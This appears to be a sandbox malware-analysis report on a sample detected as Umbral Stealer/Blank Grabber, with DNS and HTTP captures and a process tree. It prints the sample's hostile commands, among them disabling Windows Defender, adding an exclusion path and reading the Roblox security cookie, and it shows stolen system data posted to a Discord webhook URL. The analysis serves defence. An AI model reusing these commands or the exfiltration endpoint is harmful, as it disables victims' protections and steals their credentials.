| Jan 12, 2025 07:11:29.089546919 CET | 192.168.2.5 | 1.1.1.1 | 0xbd84 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:37.030709982 CET | 192.168.2.5 | 1.1.1.1 | 0xb1f1 | Standard query (0) | 0.tcp.eu.ngrok.io | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 12, 2025 07:10:22.315609932 CET | 1.1.1.1 | 192.168.2.5 | 0x514b | No error (0) | 0.tcp.eu.ngrok.io | | 18.153.198.123 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:10:25.139559984 CET | 1.1.1.1 | 192.168.2.5 | 0xf971 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:10:37.273447990 CET | 1.1.1.1 | 192.168.2.5 | 0xc007 | No error (0) | 0.tcp.eu.ngrok.io | | 18.153.198.123 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:02.365344048 CET | 1.1.1.1 | 192.168.2.5 | 0x9dab | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:29.096240997 CET | 1.1.1.1 | 192.168.2.5 | 0xbd84 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:29.096240997 CET | 1.1.1.1 | 192.168.2.5 | 0xbd84 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:29.096240997 CET | 1.1.1.1 | 192.168.2.5 | 0xbd84 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:29.096240997 CET | 1.1.1.1 | 192.168.2.5 | 0xbd84 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:29.096240997 CET | 1.1.1.1 | 192.168.2.5 | 0xbd84 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false |
| Jan 12, 2025 07:11:37.039302111 CET | 1.1.1.1 | 192.168.2.5 | 0xb1f1 | No error (0) | 0.tcp.eu.ngrok.io | | 3.78.28.71 | A (IP address) | IN (0x0001) | false |
• discord.com
• ip-api.com

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49709 | 208.95.112.1 | 80 | 1784 | C:\Users\user\AppData\Local\Temp\MoonHub.exe |

Timestamp: Jan 12, 2025 07:10:25.145576954 CET, Bytes transferred: 80, Direction: OUT, Data:
GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Timestamp: Jan 12, 2025 07:10:25.684659004 CET, Bytes transferred: 175, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 06:10:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49947 | 208.95.112.1 | 80 | 1784 | C:\Users\user\AppData\Local\Temp\MoonHub.exe |

Timestamp: Jan 12, 2025 07:11:02.375327110 CET, Bytes transferred: 55, Direction: OUT, Data:
GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com

Timestamp: Jan 12, 2025 07:11:02.877388954 CET, Bytes transferred: 381, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Sun, 12 Jan 2025 06:11:01 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 22
X-Rl: 43
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.550018162.159.135.2324431784C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2025-01-12 06:11:29 UTC360OUTPOST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1
                                                                                                                                                                              Accept: application/json
                                                                                                                                                                              User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                              Host: discord.com
                                                                                                                                                                              Content-Length: 938
                                                                                                                                                                              Expect: 100-continue
                                                                                                                                                                              Connection: Keep-Alive
2025-01-12 06:11:29 UTC | 25 | IN | HTTP/1.1 100 Continue
2025-01-12 06:11:29 UTC | 938 | OUT | Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 436432\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
2025-01-12 06:11:29 UTC | 1302 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:11:29 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                              x-ratelimit-reset: 1736662291
                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2qTdgF1Cr38SEOGT23HWMs6OeP2AjvXe7equFCOi%2Fg5%2BwmV0tBGXLwLfu%2FlHCjDB9G1NO7lVFjLmxZQ05gmsEGqFdLEJMQ6q2VAgIo4M3DjVLI%2FrsnCdsgugyIE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Set-Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                              Set-Cookie: _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 900afd4ebf5178e7-EWR
                                                                                                                                                                              {"message": "Unknown Webhook", "code": 10015}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 50020 | 162.159.135.232 | 443 | 1784 | C:\Users\user\AppData\Local\Temp\MoonHub.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-12 06:11:30 UTC | 531 | OUT | POST /api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQpohmaCuB-PwAuIP1xAUKw HTTP/1.1
                                                                                                                                                                              Accept: application/json
                                                                                                                                                                              User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                                              Content-Type: multipart/form-data; boundary="703c72e1-c87c-4eef-8ef2-55b55c6bd982"
                                                                                                                                                                              Host: discord.com
                                                                                                                                                                              Cookie: __cfruid=1a2e9aa9e0e9b0ac8198ee6fe4f49730073d799f-1736662289; _cfuvid=ob.OhzKQJmx9WAujruvt5OUCQLs9zf27vN7AvFbXxI4-1736662289919-0.0.1.1-604800000
                                                                                                                                                                              Content-Length: 656684
                                                                                                                                                                              Expect: 100-continue
2025-01-12 06:11:30 UTC | 25 | IN | HTTP/1.1 100 Continue
2025-01-12 06:11:30 UTC | 40 | OUT | Data Ascii: --703c72e1-c87c-4eef-8ef2-55b55c6bd982
2025-01-12 06:11:30 UTC | 140 | OUT | Data Ascii: Content-Type: application/zip
Content-Disposition: form-data; name=file; filename=Umbral-436432.zip; filename*=utf-8''Umbral-436432.zip
2025-01-12 06:11:31 UTC | 1011 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sun, 12 Jan 2025 06:11:31 GMT
                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                              Content-Length: 45
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                              x-ratelimit-limit: 5
                                                                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                                                                              x-ratelimit-reset: 1736662292
                                                                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                                                                              via: 1.1 google
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKVv4Q0YGUof%2FDk4xwgppxhE%2BNTAm7CbOF7VlJb5z13OICd9Uoh6%2B8tuWasMP7cVdvDmMG32JN%2BZYm3HS0BCtGI%2B3a2vln4sPZ86subu3v8Vv%2BolQgP4lYHf2nNG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 900afd53ae194308-EWR
                                                                                                                                                                              {"message": "Unknown Webhook", "code": 10015}



                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:01:10:11
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\resembleC2.exe"
                                                                                                                                                                              Imagebase:0xc70000
                                                                                                                                                                              File size:131'072 bytes
                                                                                                                                                                              MD5 hash:4C8044C83F60465EAE3CC16D7C858085
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:01:10:18
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                                                                                                                                                                              Imagebase:0xd70000
                                                                                                                                                                              File size:46'080 bytes
                                                                                                                                                                              MD5 hash:8C7D2F0A936DBE6D0899D40171FFB668
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 34%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:01:10:18
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\OpenWith.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                              Imagebase:0x7ff7ead40000
                                                                                                                                                                              File size:123'984 bytes
                                                                                                                                                                              MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:01:10:19
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                                                                                                                                                                              Imagebase:0x156585b0000
                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                              MD5 hash:F70B5E56A09AF292D4E909C547F9C8C0
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2902392061.000001565AA5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: Joe Security
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, Author: ditekSHen
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                              • Detection: 76%, ReversingLabs
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:01:10:23
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:01:10:23
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                                                                                                                                                                              Imagebase:0x7ff6f5ae0000
                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:10
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:01:10:25
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

Target ID:14
Start time:01:10:28
Start date:12/01/2025
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6ef0c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:01:10:33
Start date:12/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:01:10:33
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:01:10:36
Start date:12/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:01:10:36
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:01:10:47
Start date:12/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:01:10:47
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:01:11:02
Start date:12/01/2025
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" os get Caption
Imagebase:0x7ff76d7b0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:01:11:02
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:01:11:03
Start date:12/01/2025
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" computersystem get totalphysicalmemory
Imagebase:0x7ff76d7b0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:01:11:03
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:01:11:04
Start date:12/01/2025
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:"wmic.exe" csproduct get uuid
Imagebase:0x7ff76d7b0000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:01:11:04
Start date:12/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                              Target ID:28
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:29
                                                                                                                                                                              Start time:01:11:04
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:30
                                                                                                                                                                              Start time:01:11:27
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"wmic" path win32_VideoController get name
                                                                                                                                                                              Imagebase:0x7ff76d7b0000
                                                                                                                                                                              File size:576'000 bytes
                                                                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:31
                                                                                                                                                                              Start time:01:11:27
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:32
                                                                                                                                                                              Start time:01:11:30
                                                                                                                                                                              Start date:12/01/2025
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\AppData\Local\Temp\MoonHub.exe" && pause
                                                                                                                                                                              Imagebase:0x7ff6fcb20000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:33
                                                                                                                                                                              Start time:01:11:30
